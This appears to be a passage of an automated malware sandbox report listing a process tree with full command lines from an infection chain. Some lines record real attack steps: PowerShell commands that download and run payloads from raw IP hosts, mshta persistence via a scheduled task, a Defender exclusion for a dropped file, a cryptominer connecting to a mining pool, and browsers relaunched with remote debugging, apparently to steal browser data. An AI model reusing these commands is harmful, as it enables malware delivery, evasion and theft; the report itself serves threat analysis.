| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe
"C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn dC5qAma86c3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn dC5qAma86c3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE
"C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\162.tmp\163.tmp\164.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2788 -ip 2788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 808
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES35B1.tmp" "c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\CSC1D221A13830145B39B7013BD391E7E61.TMP"
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4044 -ip 4044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 808
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\iSoxSIyN\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe0d36cc40,0x7ffe0d36cc4c,0x7ffe0d36cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1884 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2296 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2108,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2372 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4228 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4260,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4960 /prefetch:8
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5424,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5472 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe11fb46f8,0x7ffe11fb4708,0x7ffe11fb4718
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe
"C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2456 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5020 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5024 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2440 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3624 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5064 /prefetch:2
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe11fb46f8,0x7ffe11fb4708,0x7ffe11fb4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,18106494942960664179,16632825225270950601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe292346f8,0x7ffe29234708,0x7ffe29234718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2936 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
